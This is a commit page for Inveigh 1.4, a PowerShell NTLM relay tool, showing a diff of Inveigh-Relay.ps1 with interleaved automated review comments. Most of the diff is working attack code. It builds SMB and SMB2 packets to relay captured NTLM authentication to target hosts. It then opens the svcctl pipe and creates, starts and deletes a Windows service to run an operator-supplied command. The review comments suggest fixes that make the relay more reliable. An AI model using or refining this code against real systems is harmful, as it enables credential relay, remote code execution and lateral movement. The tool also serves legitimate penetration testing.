authorKevin Robertson <robertsonk@gmail.com>2018-02-20 22:46:15 -0500
committerKevin Robertson <robertsonk@gmail.com>2018-02-20 22:46:15 -0500
commit35d73e918733631b6bae2fe3c80865b9280399d9 (patch)
tree53ac386120ca4acaafe0a0eb79bc89ece570022c
parent43edf71b54567698d24d7c44ce3410120841b53a (diff)
downloadInveigh-35d73e918733631b6bae2fe3c80865b9280399d9.tar.gz
Inveigh-35d73e918733631b6bae2fe3c80865b9280399d9.zip
Inveigh 1.4 dev bug fixes
Fixed a lot of bugs with the new Inveigh Relay session attack mode. Tweaked the SMB2 credits in Inveigh-Relay, Invoke-SMBExec, and Invoke-SMBClient to hopefully keep the sessions from erroring out after lots of repeated use. Switched to an SMB2 Echo to keep the sessions active. Fixed some output issues. Multitarget still isn't working correctly.
-rw-r--r--Inveigh-Relay.ps1401
-rw-r--r--Inveigh.ps1353
-rw-r--r--Invoke-SMBClient.ps190
-rw-r--r--Invoke-SMBExec.ps1116
4 files changed, 495 insertions, 465 deletions
diff --git a/Inveigh-Relay.ps1 b/Inveigh-Relay.ps1
index 49c5629..dfd9500 100644
--- a/Inveigh-Relay.ps1
+++ b/Inveigh-Relay.ps1
@@ -238,6 +238,11 @@ if($Attack -eq 'Execute' -and !$Command)
Write-Output "[-] -Command requiried with -Attack Execute"
throw
}
+elseif($Attack -eq 'Session' -and $SMB1)
+{
+ Write-Output "[-] -SMB1 not suppported with -Attack Session"
+ throw
+}
if(!$FileOutputDirectory)
{
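Review bot: The new error string on the `-SMB1`/`-Attack Session` guard has a typo, `suppported`; it should read `Write-Output "[-] -SMB1 not supported with -Attack Session"`. This is the text operators see when the combination is rejected, so it is worth fixing before the release. The enclosing `if`/`elseif` chain starts before this hunk.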
@@ -396,6 +401,11 @@ else
$inveigh.newline = ""
}
+if($inveigh.running)
+{
+ $inveigh.output_pause = $true
+}
+
# Write startup messages
$inveigh.output_queue.Add("[*] Inveigh Relay $inveigh_version started at $(Get-Date -format s)") > $null
@@ -410,7 +420,7 @@ if($HTTP -eq 'Y')
if($HTTP_port_check)
{
$HTTP = "N"
- $inveigh.output_queue.Add("[+] HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null
+ $inveigh.output_queue.Add("[-] HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null
}
else
{
@@ -727,7 +737,7 @@ elseif($RunTime -gt 1)
if($ShowHelp -eq 'Y')
{
- $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop Inveigh-Relay") > $null
+ $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop manually") > $null
if($inveigh.console_output)
{
@@ -796,10 +806,10 @@ while($inveigh.output_queue.Count -gt 0)
}
-$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
-$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
-$process_ID = $process_ID -replace "-00-00",""
-[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+if($inveigh.running)
+{
+ $inveigh.output_pause = $false
+}
# Begin ScriptBlocks
@@ -812,6 +822,7 @@ $shared_basic_functions_scriptblock =
param ([Int]$length_start,[Byte[]]$string_extract_data)
$string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
+
return $string_length
}
@@ -820,6 +831,7 @@ $shared_basic_functions_scriptblock =
param ([Int]$length_start,[Byte[]]$string_extract_data)
$string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
+
return $string_length
}
@@ -831,6 +843,7 @@ $shared_basic_functions_scriptblock =
$string_data = $string_data -replace "-00",""
$string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$string_extract = New-Object System.String ($string_data,0,$string_data.Length)
+
return $string_extract
}
@@ -851,6 +864,16 @@ $packet_functions_scriptblock =
return $byte_array
}
+ function Get-ProcessIDArray
+ {
+ $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
+ $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
+ [Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ return $process_ID_bytes
+ }
+
+
#NetBIOS
function New-PacketNetBIOSSessionService
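Review bot: `Get-ProcessIDArray` converts the PID to a hex string and then parses it back into bytes, but `[System.BitConverter]::GetBytes` on the `Int32` PID already yields the four little-endian bytes the callers consume; the body reduces to `[Byte[]]$process_ID_bytes = [System.BitConverter]::GetBytes([Int32]$process_ID)`. A one-line comment would also help the reader, e.g. `# 4-byte little-endian PID for the SMB/SMB2 header ProcessID field`. As a style nit, the function is followed by two blank lines where the rest of the scriptblock uses one.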
@@ -873,6 +896,8 @@ $packet_functions_scriptblock =
{
param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+ $packet_process_ID = $packet_process_ID[0,1]
+
$packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
$packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
$packet_SMBHeader.Add("Command",$packet_command)
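Review bot: The new `$packet_process_ID = $packet_process_ID[0,1]` silently drops the upper two bytes of the PID that `Get-ProcessIDArray` now returns, and nothing says why; a comment would save the next reader a trip to the spec: `# SMB1 header carries the PID as a 16-bit PIDLow; keep only the low two bytes of the 4-byte array`. If the header dictionary built further down in this function also has a PIDHigh field, the dropped bytes `[2,3]` could be placed there instead of discarded — worth confirming against the rest of the function, which continues outside this hunk.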
@@ -1087,7 +1112,7 @@ $packet_functions_scriptblock =
function New-PacketSMB2Header
{
- param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+ param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
[Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
@@ -1102,7 +1127,7 @@ $packet_functions_scriptblock =
$packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("MessageID",$packet_message_ID)
- $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("ProcessID",$packet_process_ID)
$packet_SMB2Header.Add("TreeID",$packet_tree_ID)
$packet_SMB2Header.Add("SessionID",$packet_session_ID)
$packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
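Review bot: `ProcessID` is a fixed four-byte header field, but `$packet_process_ID` is copied into it without a length check, and because the new parameter was inserted positionally between the message ID and the tree ID, any caller that was not updated would pass its tree ID here and its session ID as the tree ID with no complaint from PowerShell. Every caller visible in this diff was updated, but a guard makes a missed one fail loudly instead of emitting a misaligned header: `if($packet_process_ID.Length -ne 4){ throw "New-PacketSMB2Header: ProcessID must be 4 bytes" }`. The parameter block is in the preceding hunk and the function's `return` follows this one.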
@@ -1110,6 +1135,15 @@ $packet_functions_scriptblock =
return $packet_SMB2Header
}
+ function New-PacketSMB2Echo
+ {
+ $packet_SMB2EchoRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2EchoRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2EchoRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2EchoRequest
+ }
+
function New-PacketSMB2NegotiateProtocolRequest
{
$packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
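Review bot: `New-PacketSMB2Echo` is added with no comment on what it is for or how it is wired in; the commit message says an SMB2 Echo now keeps sessions alive, but this hunk shows neither the command code it is sent with nor the caller. A header comment such as `# SMB2 ECHO request body (StructureSize 4, Reserved 2), used as a keep-alive for idle relay sessions; paired with the ECHO command code in New-PacketSMB2Header` would make the intent clear. The keep-alive loop that sends it is not in this diff.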
@@ -1596,7 +1630,7 @@ $SMB_relay_functions_scriptblock =
function SMBRelayChallenge
{
- param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$signing_check)
+ param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_process_ID)
if($SMB_relay_socket)
{
@@ -1614,7 +1648,7 @@ $SMB_relay_functions_scriptblock =
'NegotiateSMB'
{
- $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
+ $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $SMB_process_ID 0x00,0x00
$packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -1627,8 +1661,20 @@ $SMB_relay_functions_scriptblock =
if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42')
{
- $SMB_version = 'SMB1'
- $SMB_client_stage = 'NTLMSSPNegotiate'
+
+ if($Attack -eq 'Session')
+ {
+ $inveigh.target_list.Remove($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Removed target $($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString) due to SMB1 requirement")
+ $SMB_relay_socket.Close()
+ $SMB_client_stage = 'exit'
+ }
+ else
+ {
+ $SMB_version = 'SMB1'
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+ }
+
}
else
{
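Review bot: The `output_queue.Add(...)` call in the new Session branch lacks the `> $null` that this same commit adds to every other `ArrayList.Add` call, so the returned index leaks into the runspace's pipeline output: `$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Removed target $($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString) due to SMB1 requirement") > $null`. Removing the target from the shared `$inveigh.target_list` from inside a relay runspace may also race with other runspaces that enumerate that list; whether it is a synchronized collection is not visible here. `SMBRelayChallenge` starts before this hunk and continues after it.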
@@ -1656,7 +1702,7 @@ $SMB_relay_functions_scriptblock =
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
$SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$SMB2_message_ID = 1
- $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -1674,7 +1720,7 @@ $SMB_relay_functions_scriptblock =
if($SMB_version -eq 'SMB1')
{
- $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $SMB_process_ID 0x00,0x00
$packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
@@ -1686,8 +1732,8 @@ $SMB_relay_functions_scriptblock =
}
else
{
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
@@ -1713,7 +1759,7 @@ $SMB_relay_functions_scriptblock =
function SMBRelayResponse
{
- param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID)
+ param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID,$SMB_process_ID)
$SMB_client_receive = New-Object System.Byte[] 1024
@@ -1724,7 +1770,7 @@ $SMB_relay_functions_scriptblock =
if($SMB_version -eq 'SMB1')
{
- $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $SMB_process_ID $SMB_user_ID
$packet_SMB_header["UserID"] = $SMB_user_ID
$packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
@@ -1739,7 +1785,7 @@ $SMB_relay_functions_scriptblock =
{
$SMB2_message_ID = 3
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
@@ -1764,10 +1810,10 @@ $SMB_relay_functions_scriptblock =
if($HTTP_NTLM_domain_string -ne '')
{
- $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null
}
- $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null
$SMB_relay_failed = $true
$SMB_relay_socket.Close()
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay authentication failed for $HTTP_username_full on $Target") > $null
@@ -1778,7 +1824,7 @@ $SMB_relay_functions_scriptblock =
function SMBRelayExecute
{
- param ($SMB_relay_socket,$SMB_version,$SMB_user_ID,$SMB_session_ID)
+ param ($SMB_relay_socket,$SMB_version,$SMB_user_ID,$SMB_session_ID,$SMB_process_ID)
$SMB_client_receive = New-Object System.Byte[] 1024
@@ -1852,7 +1898,7 @@ $SMB_relay_functions_scriptblock =
'TreeConnectAndXRequest'
{
- $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBTreeConnectAndXRequest $SMB_path_bytes
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -1869,7 +1915,7 @@ $SMB_relay_functions_scriptblock =
{
$SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl
$SMB_tree_ID = $SMB_client_receive[28,29]
- $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -1885,7 +1931,7 @@ $SMB_relay_functions_scriptblock =
'RPCBind'
{
$SMB_FID = $SMB_client_receive[42,43]
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
@@ -1905,7 +1951,7 @@ $SMB_relay_functions_scriptblock =
'ReadAndXRequest'
{
Start-Sleep -m 150
- $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBReadAndXRequest
$packet_SMB_data["FID"] = $SMB_FID
@@ -1921,7 +1967,7 @@ $SMB_relay_functions_scriptblock =
'OpenSCManagerW'
{
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
@@ -1967,12 +2013,12 @@ $SMB_relay_functions_scriptblock =
if($HTTP_NTLM_domain_string -ne '')
{
- $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null
}
if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target"))
{
- $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null
}
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full does not have execution privilege on $Target") > $null
@@ -1986,7 +2032,7 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW'
{
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
@@ -2008,7 +2054,7 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW_First'
{
$SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
$packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
$packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
@@ -2040,7 +2086,7 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW_Middle'
{
$SMB_split_stage++
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
$SMB_split_index_tracker += $SMB_split_index
$packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
@@ -2070,7 +2116,7 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW_Last'
{
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
$packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
@@ -2096,7 +2142,7 @@ $SMB_relay_functions_scriptblock =
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service created on $Target") > $null
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute SMB relay command on $Target") > $null
$SMB_service_context_handle = $SMB_client_receive[92..111]
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
@@ -2138,7 +2184,7 @@ $SMB_relay_functions_scriptblock =
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service failed to start on $Target") > $null
}
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
@@ -2173,7 +2219,7 @@ $SMB_relay_functions_scriptblock =
$packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
}
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
@@ -2191,7 +2237,7 @@ $SMB_relay_functions_scriptblock =
'CloseRequest'
{
- $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBCloseRequest 0x00,0x40
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -2206,7 +2252,7 @@ $SMB_relay_functions_scriptblock =
'TreeDisconnect'
{
- $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBTreeDisconnectRequest
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -2221,7 +2267,7 @@ $SMB_relay_functions_scriptblock =
'Logoff'
{
- $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBLogoffAndXRequest
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -2260,7 +2306,7 @@ $SMB_relay_functions_scriptblock =
{
$SMB2_message_ID = 4
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
- $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2277,8 +2323,8 @@ $SMB_relay_functions_scriptblock =
{
$SMB2_tree_ID = 0x01,0x00,0x00,0x00
$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes
$packet_SMB2_data["Share_Access"] = 0x07,0x00,0x00,0x00
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
@@ -2296,8 +2342,8 @@ $SMB_relay_functions_scriptblock =
{
$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
$SMB_file_ID = $SMB_client_receive[132..147]
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
$packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
@@ -2316,12 +2362,11 @@ $SMB_relay_functions_scriptblock =
'ReadRequest'
{
-
Start-Sleep -m 150
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditCharge"] = 0x10,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID
+ $packet_SMB2_data["Length"] = 0xff,0x00,0x00,0x00
